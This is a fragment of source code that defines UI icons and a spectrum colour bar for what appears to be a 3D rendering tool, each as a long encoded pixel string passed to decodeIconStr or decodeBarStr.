icon_map3dparam = decodeIconStr("27wA27wA27wA27wA27wA27wA3nIC6pMJ6pMJ3nIC27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA3nIC6qMj6qM/6qM/6qMj3nIC27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA6pMJ6qM/////////6qM/6pMJ27wA27wA27wA27wA27wA27wA27wA27wA27wANNNOSQMz5qM/////////5qM/SQMzNNNO27wA27wA27wA27wA27wA27wAMMMIMMMrXXX/www/5wg/6qM/5qM/vnX/bbb/PPP/MMMrMMMI27wA27wA27wA27wAMMM1xxx/777/222/yyy/zxu/caY/bbb/ggg/iii/YYY/MMM127wA27wA27wA27wAMMM/+++/zzz/yyy/yyy/yyy/ZZZ/bbb/ddd/fff/kkk/MMM/27wA27wA27wA27wAMMM/////yyy/yyy/yyy/yyy/ZZZ/bbb/ddd/eee/lll/MMM/27wA27wA27wA27wAMMM/////yyy/yyy/yyy/yyy/ZZZ/bbb/ddd/eee/nnn/MMM/27wA27wA27wA3nICRPM//97/yyy/yyy/yyy/yyy/ZZZ/bbb/ddd/eee/rpm/RPM/3nIC27wA3nIC6qMj5qM/6qM/2ue/zzz/444/999/666/rrr/fff/tkU/5qM/5qM/6qMj3nIC6pMJ6qM/////////6qM/+96/////////////////985/6qM/////////6qM/6pMJ6pMJ6qM/////////6qM/+86/////////////////974/6qM/////////6qM/6pMJ3nIC6qMj6qM/6qM/pfM2PPP+mmm/555/000/hhh/PPP+pfM26qM/6qM/6qMj3nIC27wA3nIC6pMJ6pMJ3nICMMMEMMMaMMMwMMMwMMMaMMME3nIC6pMJ6pMJ3nIC27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_mat = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wAVJAMXKBnXLB1WJA9XLB1XKBnVJAM27wA27wA27wA///A///A///A27wAVAAAWJBgYMD9ukW/1sc/5we/0qY/sgQ/XLB9WJBgVAAA27wA///A///A///A27wAWJBghXM96zk/8yf/7wa/7vY/7vZ/YUN/TQM/aPF9WJBg27wA///A///A///AVIALZNE970o/7wb/QNG/QNG/7vX/7vX/JHD/DDD/bXP/XKB9VIAL///A///A///AXKBpype/8zj/7vX/QNG/QNG/7vX/7vX/sjR/IGD/keS/rfQ/XKBp///A///A///AXLB36zp/7xc/7vX/7vX/7vX/7vX/7vX/7vX/7vX/7vZ/0qZ/XLB3///A///A///AVJA+95x/2rX/fYM/zoU/7vX/7vX/7vX/7vX/7vX/7vY/6wf/VJA+///A///A///AXKB361s/VTO/AAA/NKF/7vX/7vX/meP/IGD/JHD/tkU/1rc/XKB3///A///A///AXKBq0tj/cba/AAA/HGD/7vX/7vX/IGD/AAA/AAA/VTQ/ujW/XKBq///A///A///AVIAMaPG920w/RPN/meP/7vX/7vX/gaM/BAA/HHH/njd/YMD9VIAM///A///A///A27wAWKBilbS995y/91n/8xd/7vZ/7xc/4wh/4yn/iXM9WKBi27wA///A///A///A27wAQQABWKBiaOF9zsj/61s/95x/5zp/xpe/ZNE9WKBiQQAB27wA///A///A///A27wA27wA27wAVIAMXKBqXKB3VJA+XKB3XKBqVIAM27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_matmix = decodeIconStr("27wA27wA27wA27wA27wA27wA27wAMIFdUMG7WNF+WNF+SLG5LHFS27wA27wA///A27wA27wA27wA27wA27wASLGAOJGziYN/xmV/wmT/pgQ/jaN/YPH/NJGm27wA///A27wA27wA27wA27wA27wAMIFjlbR/9ye/6sQ/zlJ/sgJ/ofM/ngT/YPH/MIGT///A27wA27wA27wA27wA27wAXQJ/6xk/9xZ/6sQ/5qM/zlK/sfI/ofM/jaN/SLG5///A27wA27wA27wA27wAHHHGgXQ//4r/8xc/7vX/7tR/5pM/zlK/sgJ/pgQ/WMF+///A27wA27wA27wA27wAJOVVYbf/58//y27/wz3/7vY/7tS/4pM/ykJ/vmU/WMF////A27wAAAAALIGkTMG+NQU/Qcu/Sfz/Sfz/Wi1/wz4/7vZ/7sR/6sR/wmW/UMH8///ASLGAOJG1iYN/xmV/kns/Rfz/99+/++//Rfz/z27/8ye/9yc/9zg/iYN/LIFh///AMHFilbR/9ye/6sQ/jns/Rfz/////////Rfz/57///4q/6xk/lbR/NJG227wA///AYQJ96xk/9xZ/6sQ/orw/Tgz/Rfz/Rez/Qdw/Xaf/gXP/XPI/MIGoAAAA27wA///AgXQ//4r/8xc/7vX/7tR/nrw/jms/dhn/ein/WNG/GGGRAAAA27wA27wA27wA///AhYR//7x/91m/8xe/7vY/7tS/4pM/ykJ/vmU/WMF/GGGH27wA27wA27wA27wA///AbTM995x//+6/80k/8ye/7vZ/7sR/6sR/wmW/TMG+27wA27wA27wA27wA27wA///APIEitld///7//+6/91n/8ye/9yc/9zg/iYN/LIGk27wA27wA27wA27wA27wA///ARKGCRKFyskc/94v//7w//4q/6xk/lbR/OJG0AAAA27wA27wA27wA27wA27wA///A27wAQJECPIEibTL9hYQ/gXP/YQJ9MHEi27wA27wA27wA27wA27wA27wA27wA///A")
icon_tex = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AOOO6MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/OOO6///A///A///AMMM/444/555/555/555/555/666/666/777/777/888/888/MMM////A///A///AMMM/555/mmm/TTT/aaa/xxx/111/222/222/QQQ/ZZZ/777/MMM////A///A///AMMM/333/DDD/AAA/AAA/YYY/zzz/111/xxx/AAA/AAA/nnn/MMM////A///A///AMMM/222/DDD/AAA/AAA/bbb/yyy/zzz/111/RRR/AAA/iii/MMM////A///A///AMMM/666/jjj/TTT/ddd/vvv/xxx/yyy/zzz/000/rrr/555/MMM////A///A///AMMM/666/rrr/sss/uuu/vvv/www/xxx/yyy/zzz/000/666/MMM////A///A///AMMM/666/qqq/iii/qqq/uuu/vvv/ppp/nnn/yyy/zzz/555/MMM////A///A///AMMM/777/jjj/AAA/RRR/sss/bbb/AAA/AAA/SSS/yyy/555/MMM////A///A///AMMM/888/mmm/LLL/ccc/rrr/QQQ/AAA/AAA/AAA/www/555/MMM////A///A///AMMM/888/nnn/ooo/ppp/qqq/jjj/HHH/DDD/XXX/www/555/MMM////A///A///AMMM/666/888/888/777/666/666/555/555/555/444/333/MMM////A///A///ANNN4NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+OOO4///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_texcol = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AWKA4VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+WKA4///A///A///AVIA/82p/93r/93r/93s/93s/93s/93t/94u/94u/94w/95w/VIA////A///A///AVIA/93s/xoV/ZVM/icR/6wf/8zi/80k/80l/USN/daU/94v/VIA////A///A///AVIA/72r/FDC/AAA/AAA/eZP/8yf/8zh/3vg/AAA/AAA/olf/VIA////A///A///AVIA/50p/DCB/AAA/AAA/faO/8xd/8yf/8zh/SPK/AAA/jga/VIA////A///A///AVIA/94t/rhO/WRI/haN/5uY/7wb/8xd/8yf/7yg/tma/72r/VIA////A///A///AVIA/94u/6sQ/6tT/7uV/7uX/7vY/7wa/7xc/8ye/8yg/93s/VIA////A///A///AVIA/94u/6rO/ylO/5sS/7uU/7uW/1qV/yoW/7xc/8ye/93s/VIA////A///A///AVIA/+5w/zlL/DDD/bVK/6tS/mdN/AAA/AAA/YTK/7xc/93r/VIA////A///A///AVIA/+5x/3oL/NKD/mcK/6sQ/WQG/AAA/AAA/BAA/5uZ/93r/VIA////A///A///AVIA/+6z/6qM/6qM/6qM/6rO/ujM/IGC/BBA/aUJ/7vX/93r/VIA////A///A///AVIA/+5w/+6y/+5w/+4v/94t/93s/82r/93r/93r/93r/92p/VIA////A///A///AWJA6VJA/WJB/WJB/WJB/WJB/WJB/WJB/WJB/WJB/WJB/VJA/WJA6///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_texmix = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///APPP7ccc/ddd/ccc/bbb/bbb/ddd/eee/RRR9///A///A///A///A///A///A///AYYY+yyy/fff/qqq/000/111/jjj/sss/eee////A///A///A///A///A///A///Aaaa9XXX/AAA/III/rrr/xxx/LLL/GGG/VVV////A///A///A///A///A///A///AZZZ9hhh/JJJ/XXX/rrr/uuu/kkk/eee/YYY////A///A///A///A///A///A///AVYd/sv0/imq/nqu/rrr/ttt/vvv/000/bbb////A///APPP7ccc/ddd/ccc/Ycg/Qcu/Sfz/Sfz/Wi1/fin/RRR/bbb/yyy/bbb////A///AYYY+yyy/fff/qqq/x05/Rfz/99+/++//Rfz/PSX/AAA/AAA/uuu/bbb////A///Aaaa9XXX/AAA/III/orw/Rfz/////////Rfz/lpu/XXX/eee/000/ccc////A///AZZZ9hhh/JJJ/XXX/osw/Tgz/Rfz/Rez/Qdw/Wae/bbb9aaa9YYY9PPP7///A///AYYY9vvv/lll/ppp/rrr/pty/sw1/w06/Ych////A///A///A///A///A///A///AZZZ9sss/SSS/iii/hhh/RRR/bbb/yyy/bbb////A///A///A///A///A///A///AZZZ9rrr/JJJ/eee/SSS/AAA/AAA/uuu/bbb////A///A///A///A///A///A///AZZZ+111/ttt/uuu/ooo/XXX/eee/000/ccc////A///A///A///A///A///A///AOOO4aaa9aaa9ZZZ9ZZZ9bbb9aaa9YYY9PPP7///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_texmixcol = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AaOE7mcS/ndT/mcS/lbS/kbS/ndU/neV/bQH9///A///A///A///A///A///A///AiYP+92o/niY/0tg//4p//6s/pme/wun/neV////A///A///A///A///A///A///AkZP9aYT/AAA/LJF/5vd//2j/OMH/GHH/eVN////A///A///A///A///A///A///AjYP9qlZ/OKE/haO/7wb/+zf/voZ/jgY/hYP////A///A///A///A///A///A///AXae/z27/qty/ux2/9wZ/+yc//1f//5o/lbS////A///AaOE7mcS/ndT/mcS/adh/Qcu/Sfz/Sfz/Wi1/lot/ZUK/leQ//3l/kbR////A///AiYP+92o/niY/0tg/25+/Rfz/99+/++//Rfz/TXc/AAA/BAA/9zg/lbS////A///AkZP9aYT/AAA/LJF/tx2/Rfz/////////Rfz/quz/bZU/lhX//6o/lcS////A///AjYP9qlZ/OKE/haO/uy3/Tgz/Rfz/Rez/Qdw/Ybg/laQ9laQ9iYP9aOE7///A///AhXP9/1f/6sQ/8vW/9wZ/wz4/y28/26//aej////A///A///A///A///A///A///AhXQ98xd/eWH/znR/xmR/ZUK/leQ//3l/kbR////A///A///A///A///A///A///AhYR97xb/TMA/xkL/dVG/AAA/BAA/9zg/lbS////A///A///A///A///A///A///AiYR+/7q//zb//0d/1tb/bZU/lhX//6o/lcS////A///A///A///A///A///A///AZNE4iZS9iZS9iYR9jZQ9laQ9laQ9iYP9aOE7///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_texparam = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wAOOO5GGG/BBB9AAA5AAAwAAAnAAAO27wA27wA27wA27wA27wA27wA///A875F27wAYYYZPPP/KKK/III/BBB/AAA/AAA/AAAxAAAB27wA27wA27wA27wA///AoooO875K27wAaaaTRRR/eee/lll/SSS/AAA/AAA/AAAk27wA27wA27wA27wA///AeeeX222V876J27wAbbbkSSS/iii/mmm/TTT/AAA/AAA/CCCW27wA27wA27wA///AXXXfxxxftttW887I27wAcccwSSS/OOO/PPP/III/RRR/CCC/CCC3CCCL27wA///ATTTmtttsQQQvbbbd887H27wAdddrVVV/PPP/hhh/222/lll/NNN/HFE/KFCo///APPPssss3HHH6NNNwZZZd988G27wA27wAXXXlXXX/999/333/jhg/ZPK/WOJ5///AMMMvsss/jjj1XXXxrrrf333R998F27xA27wAYYYvggg/554/meX/eUO/ZQL////AJJJyvvv/jjj/oooztttoyyyc444Q999E27xAfffAYXW7jeZ/4yt/pfX/gWP////AHHH0zzz/iii/jjj+oooytttnlllggggX+99D27xALFAFKGD9wql/2wr/peW////AFFF3333/HHH/QQQ/jjj9mmmyDDD8KKKxTTTe555D26xAIFDKMHE+0vq/1uo////ADDD6666/HHH/QQQ/jjj/kkk8DDD+BBB+JJJyrrrR+++C26xAKFDROKG/wog+///ABBB9555/777/333/000/www/rrr9bbb6fffv000Y555M///B26xAKFCYOKF0///ABBB5BBB9DDD6EEE4GGG1IIIzKKKxNNNtPPPmSSSfUUUXUUUODDDE26xA27wA///A")
icon_emission = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wAAAAgAAA/AAAg27wA27wA27wA///A///A///A///A///A///A///A27wAAAAFAAAxAAA/AAA/AAA/AAAxAAAF27wA///A///A///A///A///A///A///A27wAAAAZooo5////444/nnn/KKK2AAAZ27wA///A///A///A///A///A///A///A27wAAAALSSS/ggg/bbb/AAA/AAA/AAAL27wA///A///A///A///A///A///A///A27wAAAAYrrr/////777/nnn/KKJ+AAAZ27wA///A///A///A///A///A///A///A27wAPNBRTRI+kiX8ebQ+ebN8NLA+PNCP27wA///A///A///A///A///A///A///AQQABVRB1qlQ483g2qlR+81Z2pkO6VRB0QQAB///A///A///A///A///A///A///ATQBlieP685t361ezjcD+5ySx61c0dYG6TQBl///A///A///A///A///A///A///AVRA453x650gwhbB93vRthbB+4yXvwrX0VRA4///A///A///A///A///A///A///AVRA+++8941ow2xbs0tRp0tRp1vUr2yiyVRA+///A///A///A///A///A///A///AUQA48868/++999772yiszuYo2yhsvsdxVRA5///A///A///A///A///A///A///ATPBlqof6//////++64yy64yy7611cYK4TPBl///A///A///A///A///A///A///AKKABUQA1qnf59989//++6525ifT4UQA1KKAB///A///A///A///A///A///A///A27wAKKABSPBkUQA4VQA+UQA4SPBkKKAB27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_spectex = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AAAATGGGzAAAiAAAA27wA27wA27wA27wA27wA27wA27wAAAADAAAjGGGxAAAT///AFFFy555/SBx/MA5+ASx9AhZ9ArC9AwA9WvA9xnA9/WA97AA/xBB/555/FFFz///AAAAUccc/ka1/MA6/ASx/AhZ/ArC/AwA/WvA/xnA//WA/9AA/1ff/SSS+AAAZ///A27wAMMM6ph2/MA6/Xi0/AhZ/ArC/AwA/WvA/xnA//WA/1bb/jjj/AAAY27wA///A27wABBBnpmv/ni6/lr1/AhZ/ArC/AwA/WvA/xnA//WA/6vv/SSS/AAAE27wA///A27wAAAAEGGG1PPP/SUY/Zsn/ArC/AwA/hyS/xnA//WA/5uu/DDDw27wA27wA///A27wA27wAAAABAAAEIII3oyw/ArC/WvW/syn/31u/3vr/nll/AAAa27wA27wA///A27wA27wA///A///AAAAnlus/BrE/v4v/TTT/kkk/444/PPP+AAAE27wA27wA///A27wA27wA27wA27wAAAAZnnn/444/555/GGG3AAAdEEExAAAM27wA27wA27wA///A27wA27wA27wA27wAAAAKaaa/555/zzz/AAAn27wA27wA27wA27wA27wA27wA///A27wA27wA27wA27wAAAAALLL8555/iii/AAAX27wA27wA27wA27wA27wA27wA///A27wA27wA27wA27wA27wAAAAPKKK6AAArAAAB27wA27wA27wA27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_c_filter = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AAAASGGG1BBBsAAAW27wA27wA27wA27wA27wA27wA27wAAAAWBBBsGGGyAAAU///AHHHx555/333/ddd/AAAl27wA27wA27wA27wA27wAAAAlddd/333/555/FFFz///AAAAUMMM8eee/555/ccc/AAAT27wA27wA27wAAAATccc/555/eee/MMM8AAAV///A27wAAAAAAAAbfff/222/GGG1AAAA27wAAAAAGGG1222/fff/AAAbAAAA27wA///A27wA27wAAAAAFFFz222/hhh/AAAW27wAAAAWhhh/222/FFFzAAAA27wA27wA///A27wA27wA27wAAAAQccc/333/EEEz27wAEEEz333/ccc/AAAQ27wA27wA27wA///A27wA27wA27wA27wAGGG1444/aaa/AAAdaaa/444/GGG127wA27wA27wA27wA///A27wA27wA27wA27wAAAAakkk/000/UUU/000/kkk/AAAa27wA27wA27wA27wA///A27wA27wA27wA27wAAAACGGG1xxx/555/xxx/GGG1AAAC27wA27wA27wA27wA///A27wA27wA27wA27wA27wAAAAFAAAoJJJ1AAAoAAAF27wA27wA27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_c_camera = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wAAAAAAAABAAABAAABAAABAAAA27wA27wA27wA27wA///A///ANNN6MMM/MMM/JJJ/MMM/LLL/LLL/LLL/LLL/MMM/MMM/MMM/MMM/OOO6///A///AMMM/vvv/ttt/ccc/mmm/jjj/ggg/hhh/jjj/ooo/sss/www/iii/MMM////A///AMMM/uuu/eee/RRR/XXX/ZZZ/mmm/xxx/ppp/ggg/jjj/ppp/eee/MMM////A///AMMM/ttt/aaa/OOO/WWW/rrr/aaa/TTT/jjj/zzz/hhh/lll/ccc/MMM////A///AMMM/sss/XXX/LLL/ggg/QQQ/HHH/KKK/QQQ/hhh/rrr/ggg/bbb/MMM////A///AMMM/rrr/VVV/JJJ/ooo/QQQ/TTT/III/JJJ/RRR/yyy/ddd/ZZZ/MMM////A///AMMM/sss/UUU/JJJ/eee/eee/www/RRR/EEE/VVV/ooo/ccc/ZZZ/MMM////A///AMMM/uuu/VVV/KKK/RRR/kkk/fff/QQQ/OOO/ooo/bbb/eee/ZZZ/MMM////A///AMMM/xxx/WWW/LLL/NNN/SSS/eee/ooo/hhh/YYY/YYY/ggg/ZZZ/MMM////A///AMMM/zzz/vvv/aaa/fff/VVV/OOO/PPP/RRR/bbb/mmm/sss/fff/NNN9///A///ANNN6MLJ/MJE/IHG/OOO+ggg/bbb/ccc/eee/jjj/NNN+MMM/NNN9MMMP///A///A27wAMHAl9jA/NIApMMMmWWW/888/////888/bbb/NNNmAAAA27wA27wA///A///A27wALGAPMHAoMHASMMMGSSS/777/////888/WWW/NNNF27wA27wA27wA///A///A27wA27wA27wA27wA27wARRRiPPP+QQQ/RRR+VVVi27wA27wA27wA27wA///A")
icon_c_environment = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AGMV1HNV7HNV7HNV7HNV7HNV7HNV7HNV7HNV7HNV7HNV7GMV1///A///A///A///AHNV7y0u/z0u/y0t/xzs/wyr/wyq/vxp/uxo/twn/svm/HNV7///A///A///A///AIOW8341/tvm/qtj/qtj/qtj/qtj/qtj/qtj/qtj/two/HNV7///A///A///A///AINV8sts/cdc/qrp/uxp/qtj/qtj/qtj/qtj/qtj/tvo/HNU7///A///A///A///AGMV7svy/Ubh/VZb/ZZZ/xyt/ruk/qtj/qtj/rul/bcb/GLU7///A///A///A///AGMV7twz/Uci/Uci/Tbg/TUU/ssq/y0u/vxr/TVT/fko/GMV7///A///A///A///AGMV7vy0/Vdj/Zgl/Xfk/Uci/RWZ/TVV/PSU/Tag/hnr/GMV7///A///A///A///AGMV7wz1/gmq/023/txz/Xfk/Uci/Uci/Uci/Uci/jos/GMV7///A///A///A///AGMV7y02/jos/////023/Zgl/Uci/Uci/Uci/Uci/kpt/GMV7///A///A///A///AGMV7z23/ahm/jos/gmq/Vdj/Uci/Uci/Uci/Uci/mru/GMV7///A///A///A///AGMV7x02/023/y02/wz1/vy0/uxz/swy/rux/ptw/lqu/GMV7///A///A///A///AGMV1GMV7GMV7GMV7GMV7GMV7GMV7GMV7GMV7GMV7GMV7GMV1///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_c_sampler = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wAMMMXSSS3MMMg27wA27wA27wA27wAMMMdTTT2MMMc27wA27wA27wA27wA27wAMMMSggg/////XXX+MMMB27wA27wA27wAUUU8////jjj/MMMT27wA27wA27wAMMMIYYY8+++/xxx/NNNuMMMCMMMCMMMCMMMCNNNqwww/////ZZZ9MMMJ27wAMMMASSS0666/+++/fff/bbb/bbb/eee/eee/bbb/bbb/ddd/999/777/SSS327wAMMMGjjj/////////////////////////////////////////////////lll/MMMI27wARRRz555/999/ccc/YYY/YYY+aaa+bbb+YYY+YYY+bbb/999/666/RRR2MMMB27wAMMMHWWW7999/yyy/NNNu27wA27wA27wA27wANNNtxxx/+++/YYY8MMMI27wAVVqARfzGOTZZeee/////WWW+QctHRfzLRfzLRfzGUUU8////hhh/OSYaRfzGVVqARfzGRezcRfz5PXj8STV5NPSiRezcRfz5Rfz5RezcNQThRST6PYk7Rfz5RezcRfzGRfzLRfz5////////Rfz5RfzMRfz5////////Rfz5RfzMRfz5////////Rfz5RfzLRfzLRfz5////////Rfz5RfzMRfz5////////Rfz5RfzMRfz5////////Rfz5RfzLRfzGRezcRfz5Rfz5RezcRfzKRezcRfz5Rfz5RezcRfzKRezcRfz5Rfz5RezcRfzGVVqARfzGRfzLRfzLRfzGVVqARfzGRfzLRfzLRfzGVVqARfzGRfzLRfzLRfzGVVqA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_c_integrator = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wAAAAAEJPYHMT0MRY+GLS0EJPYAAAA27wA27wA27wA27wA27wA27wA27wA27wAAAVAEJPoVai/lr0/elv/Xeo/LRZ/EIPnDHOEAAVA27wA27wA27wA27wA27wA27wAEIPcZel/rw5/cir/NTb/SYi/PWh/MSb/QVd/KPW6EJPfAJSB27wA27wA27wAAAAAHMT4ty7/hmv/FKQyDGMXEJP7bhq/nt2/pv4/sy6/diq/EJQuIIQC27wA27wAFIQGRWd/u08/TYf/CFKQDGLfUai/flv/Zfp/SZj/bgp/rx6/fks/EJQuAJSB27wAAJSBINT7uz8/glt/EIOqGKQ4Xeo/SYi/KQY/SZk/IOW/Ydl/ty7/diq/EJPg27wA27wAEJPhflt/u08/Yel/JOW/QXi/HNV/TZi/Yfp/GLS6EJPuejr/tz8/HMT6AMMB27wAGGMCFLRxiow/u08/ciq/SZk/Yeo/gnw/Vaj/DINhDGJQQVd/u08/SXe/FIQG27wA27wAFJODFKRyhmu/u08/sy7/pv4/cir/FJQ7CGLTEIPudir/uz8/JOU6AMMB27wA27wA27wAFJODEJPjKPW8UZh/RXg/RYj/QXg/MSa/Zfo/pv4/diq/EJPg27wA27wA27wA27wA27wA27wAFKQDEIPLEJPtPVe/ahr/flv/jpz/diq/FJQtAJSB27wA27wA27wA27wA27wA27wA27wA27wAAMMBEJPeGLS5OUb/INU5EJPeAMMB27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA27wAAAAAEIQEAAVA27wA27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_c_volumeintegrator = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wAMMMAMMMWNNN8NNN9MMMWMMMA27wA27wA27wA27wA///A27wA27wAAAAAEJPYIMS3MRY/KOU/gik/ggg/TTT/MMMzMMMR27wA27wA27wA27wA27wAAAVAFJPtVai/lr0/elv/Xeo/LRZ/NQU/ggh/ddd/RRR/MMMvMMMN27wA27wA27wAHKOvZel/rw5/cir/NTb/SYi/PWh/MSb/QVd/LQW/TWZ/aaa/PPP/MMMh27wAAAAAIMS/ty7/hmv/OSX/gik/HMS/bhq/nt2/pv4/sy6/diq/MQV/hhh/MMM/27wAFIQGRWd/u08/TYf/lmn/bdf/Uai/flv/Zfp/SZj/bgp/rx6/fks/NRV/MMN/27wAAJSBINT/uz8/glt/TWa/LPU/Xeo/SYi/KQY/SZk/IOW/Ydl/ty7/diq/IKO/27wA27wAIKO/flt/u08/Yel/JOW/QXi/HNV/TZi/Yfp/INT/LOT/ejr/tz8/IMT/AMMB27wAMMM/SWb/iow/u08/ciq/SZk/Yeo/gnw/Vaj/PRU/XXY/QVd/u08/SXe/FIQG27wAMMM/899/PTY/hmu/u08/sy7/pv4/cir/HLR/UVX/KOT/dir/uz8/JOU/AMMB27wAMMM/////vww/WZd/MRX/UZh/RXg/RYj/QXg/MSa/Zfo/pv4/diq/IKO/27wA27wAMMM/////999/////999/123/VZd/PVe/ahr/flv/jpz/diq/RUa/MMN/27wA27wAMMMxRRR/rrr/888/////////+++/jmp/MRX/OUb/NRX/WYb/PQQ/MMMx27wA27wA27wANNNEMMMaMMMxWWW/www/+++/999/uuu/UUV/MMMxMMMaNNNE27wA27wA///A27wA27wA27wA27wANNNIMMMfMMM1MMM1MMMfNNNI27wA27wA27wA27wA///A")
icon_help = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wAAAAOGGGtFFF4HHH6GGG3GGGqAAAK27wA27wA27wA///A///A///A27wAAAABEEEnNNN7vvv/666/888/888/vvv/III7EEEgAAAA27wA///A///A///A27wAEEEmfff+333/333/333/lll/999/999/999/WWW8EEEd27wA///A///A///AAAAPSSS7333/zzz/111/xxx/III/+++/777/999/999/JJJ6AAAJ///A///A///AFFFtxxx/yyy/xxx/zzz/444/999/777/666/777/999/ppp/FFFh///A///A///AEEE4555/uuu/vvv/xxx/ttt/MMM/yyy/666/666/777/111/GGGy///A///A///AJJJ7666/sss/ttt/vvv/yyy/ttt/HHH/yyy/666/555/777/FFF5///A///A///ADDD3777/sss/qqq/lll/vvv/yyy/sss/EEE/777/444/xxx/GGGv///A///A///ADDDq000/xxx/iii/FFF/kkk/lll/hhh/HHH/555/333/kkk/DDDe///A///A///AAAAJNNN8999/rrr/iii/DDD/DDD/GGG/000/000/000/GGG6AAAE///A///A///A27wACCCcccc9999/yyy/ttt/sss/www/000/000/QQQ8CCCT27wA///A///A///A27wA27wACCCXMMM7www/444/777/000/ooo+III5BBBR27wA27wA///A///A///A27wA27wA27wAAAAFBBBbEEEsEEE1FFFqBBBZAAAD27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
bar_spectrum = decodeBarStr("AAA/AAA/AAB/AAC/AAD/BAF/CAH/DAK/EAN/GAQ/HAU/JAX/LAb/MAf/OAj/PAm/QAq/RAt/SAv/SAx/SAz/SA1/SA3/SA4/SA5/RA6/PA6/OA6/MA6/IA5/CA4/AA3/AD2/AJ1/AN0/AQy/ATw/AVu/AYr/AZo/Abl/Adj/Aeg/Agd/Ahb/AiY/AjW/AlT/AmR/AnO/AoL/AqI/AqE/ArA/AsA/AtA/AuA/AvA/AvA/AwA/AwA/AwA/AwA/AwA/AwA/AwA/AwA/CwA/OvA/UvA/ZuA/euA/htA/lsA/orA/rqA/tpA/woA/ymA/0lA/2jA/4hA/5fA/7eA/8cA/9aA/+YA//VA//TA//QA//NA//KA//FA/+AA/+AA/8AA/7AA/6AA/5AA/3AA/2AA/0AA/yAA/wAA/uAA/sAA/qAA/oAA/lAA/jAA/hAA/fAA/dAA/bAA/ZAA/YAA/WAA/UAA/SAA/RAA/QAA/OAA/NAA/MAA/LAA/KAA/JAA/IAA/HAA/GAA/FAA/FAA/EAA/DAA/DAA/CAA/CAA/CAA/AAA/AAA/AAB/AAC/AAD/BAF/CAH/DAK/EAN/GAQ/HAU/JAX/LAb/MAf/OAj/PAm/QAq/RAt/SAv/SAx/SAz/SA1/SA3/SA4/SA5/RA6/PA6/OA6/MA6/IA5/CA4/AA3/AD2/AJ1/AN0/AQy/ATw/AVu/AYr/AZo/Abl/Adj/Aeg/Agd/Ahb/AiY/AjW/AlT/AmR/AnO/AoL/AqI/AqE/ArA/AsA/AtA/AuA/AvA/AvA/AwA/AwA/AwA/AwA/AwA/AwA/AwA/AwA/CwA/OvA/UvA/ZuA/euA/htA/lsA/orA/rqA/tpA/woA/ymA/0lA/2jA/4hA/5fA/7eA/8cA/9aA/+YA//VA//TA//QA//NA//KA//FA/+AA/+AA/8AA/7AA/6AA/5AA/3AA/2AA/0AA/yAA/wAA/uAA/sAA/qAA/oAA/lAA/jAA/hAA/fAA/dAA/bAA/ZAA/YAA/WAA/UAA/SAA/RAA/QAA/OAA/NAA/MAA/LAA/KAA/JAA/IAA/HAA/GAA/FAA/FAA/EAA/DAA/DAA/CAA/CAA/CAA/AAA/AAA/AAB/AAC/AAD/BAF/CAH/DAK/EAN/GAQ/HAU/JAX/LAb